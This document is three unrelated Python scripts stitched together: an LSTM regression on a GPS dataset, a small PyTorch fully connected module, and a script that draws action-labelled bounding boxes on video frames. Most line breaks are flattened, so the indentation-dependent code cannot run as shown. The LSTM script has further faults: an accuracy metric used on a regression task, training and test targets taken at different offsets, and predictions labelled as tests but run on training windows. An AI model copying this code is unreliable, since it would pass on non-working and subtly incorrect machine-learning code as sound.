import numpy as np import matplotlib.pyplot as plt import pandas as pd from tensorflow.keras import Sequential from tensorflow.keras.layers import Dense, LSTM, Dropout from sklearn.preprocessing import MinMaxScaler dataset = pd.read_csv('../Dataset/GPS Database Cleaned Data-One Day.csv', parse_dates=True, index_col='date_time') # for set all decimal points to 4 dataset = np.array(dataset) len = dataset.shape[0] for row in range(len): dataset[row, 8] = round(dataset[row, 8], 5) dataset[row, 9] = round(dataset[row, 9], 5) dataset[row, 10] = round(dataset[row, 10], 5) # categorical data encoding from sklearn.preprocessing import OneHotEncoder from sklearn.compose import ColumnTransformer transformer = ColumnTransformer( transformers=[ ("OneHotEncoder", # Just a name OneHotEncoder(), # The transformer class [0] # The column(s) to be applied on. ) ], remainder='passthrough' ) dataset = transformer.fit_transform(dataset) # Avoiding Dummy Variable Trap # dataset = dataset[:, 1:] transformer = ColumnTransformer( transformers=[ ("OneHotEncoder", # Just a name OneHotEncoder(), # The transformer class [1] # The column(s) to be applied on. ) ], remainder='passthrough' ) dataset = transformer.fit_transform(dataset) # Avoiding Dummy Variable Trap # dataset = dataset[:, 1:] transformer = ColumnTransformer( transformers=[ ("OneHotEncoder", # Just a name OneHotEncoder(), # The transformer class [2] # The column(s) to be applied on. ) ], remainder='passthrough' ) dataset = transformer.fit_transform(dataset) dataset=dataset.astype('float32') # Avoiding Dummy Variable Trap # dataset = dataset[:, 1:] # Feature Scaling from sklearn.preprocessing import StandardScaler # scaler = MinMaxScaler(feature_range=(0, 2)) # scaler = StandardScaler() # dataset = scaler.fit_transform(dataset) # spliting the dataset into test data and training data from sklearn.model_selection import train_test_split training_set, test_set = train_test_split(dataset, test_size=0.1) # Prepare Training Data X_train, y_train = [], [] for i in range(6, training_set.shape[0] - 7): X_train.append(training_set[i - 6:i]) y_train.append(training_set[i+1, 8]) X_train = np.array(X_train) y_train = np.array(y_train) # X_train = np.reshape(X_train.shape[0], X_train.shape[1], 1) # y_train = np.reshape(y_train.shape[0], y_train.shape[1], 1) # Build LSTM regressor = Sequential() regressor.add(LSTM(units=100, activation='relu', input_shape=(X_train.shape[1], 11), return_sequences=True)) regressor.add(Dropout(0.2)) regressor.add(LSTM(units=170, activation='relu', return_sequences=True)) regressor.add(Dropout(0.3)) regressor.add(LSTM(units=190, activation='relu', return_sequences=True)) regressor.add(Dropout(0.4)) regressor.add(LSTM(units=250, activation='relu')) regressor.add(Dropout(0.5)) regressor.add(Dense(units=1)) regressor.compile(optimizer='adam', loss='mean_squared_error', metrics=['accuracy']) regressor.fit(X_train, y_train, epochs=15, batch_size=10) # prepare test set training_set = pd.DataFrame(training_set) test_set = pd.DataFrame(test_set) # 6*10 past_60_seconds = training_set.tail(6) test_set = past_60_seconds.append(test_set, ignore_index=True) X_test, y_test = [], [] test_set = np.array(test_set) for i in range(6, test_set.shape[0] - 6): X_test.append(test_set[i - 6:i]) y_test.append(test_set[i, 8]) X_test = np.array(X_test) y_test = np.array(y_test) X_test_0 = X_train[0] X_test_0 = np.array(X_test_0) X_test_0 = X_test_0.reshape(1, 6, 11) y_pred_0 = regressor.predict(X_test_0) X_test_1 = X_train[1] X_test_1 = np.array(X_test_1) X_test_1 = 
X_test_1.reshape(1, 6, 11) y_pred_1 = regressor.predict(X_test_1) X_test_2 = X_train[2] X_test_2 = np.array(X_test_2) X_test_2 = X_test_2.reshape(1, 6, 11) y_pred_2 = regressor.predict(X_test_2) y_pred = regressor.predict(X_test)
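
# Hedged follow-up sketch (added for illustration): score the whole test
# split with RMSE instead of eyeballing the single-window probes above.
# It uses only names already defined in this script.
from sklearn.metrics import mean_squared_error

rmse = np.sqrt(mean_squared_error(y_test, y_pred.flatten()))
print('Test RMSE:', rmse)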
python
import torch.nn as nn from MyPyTorchAPI.CustomActivation import * class FCCov(torch.nn.Module): def __init__(self, fc_input_size): super().__init__() self.fc = nn.Sequential( nn.Linear(fc_input_size, 512), nn.BatchNorm1d(512), nn.PReLU(), nn.Linear(512, 64), nn.BatchNorm1d(64), nn.PReLU(), nn.Linear(64, 64), nn.BatchNorm1d(64), Sigmoid(a=0.1, max=1), nn.Linear(64, 6)) def forward(self, x): x = self.fc(x) return x
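
# Hedged smoke test (assumes the custom Sigmoid from MyPyTorchAPI imports
# cleanly, as above). eval() sidesteps BatchNorm1d's batch-size>1 training
# requirement; the input size 128 is an arbitrary example.
if __name__ == '__main__':
    import torch
    net = FCCov(fc_input_size=128)
    net.eval()
    out = net(torch.randn(4, 128))
    print(out.shape)  # expected: torch.Size([4, 6])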
python
#!/usr/bin/env python import matplotlib.pyplot as plt import os import imageio import numpy as np import cv2 from tqdm import tqdm_notebook as tqdm import scipy.misc from generator import read_videofile_txt import os import shutil from generator import build_label2str from predict_and_save_kitty import extract_bbox_for_line import cv2 def save_vid_with_labels(kitty_folder, video_path, frame_output_folder, label_csv, id_format_colon=False, verbose=True): '''Saves a video frame by frame where a bounding box is drawn around the detected persons and an action label is provided. Needs a kitty folder where the kitty files have action labels.''' vid = imageio.get_reader(video_path, 'ffmpeg') total_frames=len(vid) kitty_files = sorted(os.listdir(kitty_folder)) frame_idxs = [int(n.split('.')[0].split('_')[-1])-1 for n in kitty_files] if verbose: print('Video loaded, len frame_idxs:', len(frame_idxs), 'len vid:', len(vid)) # Get label to string dict label2str_dict = build_label2str(label_csv) label2str_dict[-1] = 'undefined' print('label2str_dict',label2str_dict) if not os.path.exists(frame_output_folder): os.mkdir(frame_output_folder) for num in tqdm(range(total_frames)): # check for valid frame number # if num >= 0 & num <= totalFrames: # # set frame position # cap.set(cv2.CAP_PROP_POS_FRAMES,myFrameNumber) # ret, img = cap.read() # print('ret:',ret) img = vid.get_data(num) if num in frame_idxs: # Read txt file txt_line_list = read_videofile_txt(os.path.join(kitty_folder,kitty_files[num])) # print('txt_line_list:',txt_line_list) # Get all bboxes for this frame for j,line in enumerate(txt_line_list): # Extract id if id_format_colon: id_ = int(float(line.split(' ')[0].split(':')[-1])) else: id_ = int(float(line.split(' ')[1])) # Extract action label act_label = int(float(line.split(' ')[-1])) if act_label == -1: font_size=0.5 font_color = (200,200,0) bbox_color = (100,0,0) else: font_size=0.8 font_color = (255,255,0) bbox_color = (255,0,0) text_label = label2str_dict[act_label] # print('text_label:', text_label) # Getting bbox crop, bbox = extract_bbox_for_line(line, img, idx_bbox=3, margin=0.0, show=False, debug=False, k=1.0) left, right, top, bottom = bbox cv2.rectangle(img, (left,top), (right,bottom), bbox_color, 2) cv2.putText(img, text_label, (left, top), cv2.FONT_HERSHEY_SIMPLEX, font_size, font_color, lineType=cv2.LINE_AA) # if not num%10: # plt.figure() # plt.imshow(img) # plt.show() imageio.imwrite(os.path.join(frame_output_folder, str(num)+'.jpg'), img) if __name__ == "__main__": save_vid_with_labels('../../../p2_metropolis/tmp/cfosco/VIDEOS/KITTI_CFOSCOnyc_c0110_2/with_action_labels', '../../../p2_metropolis/tmp/cfosco/VIDEOS/nyc_c0110_2.mp4', frame_output_folder = '../tmp_vid', label_csv='../../../nfs_share/datasets/IVA_Videos/crops_mixed_aux/labels_5.csv')
python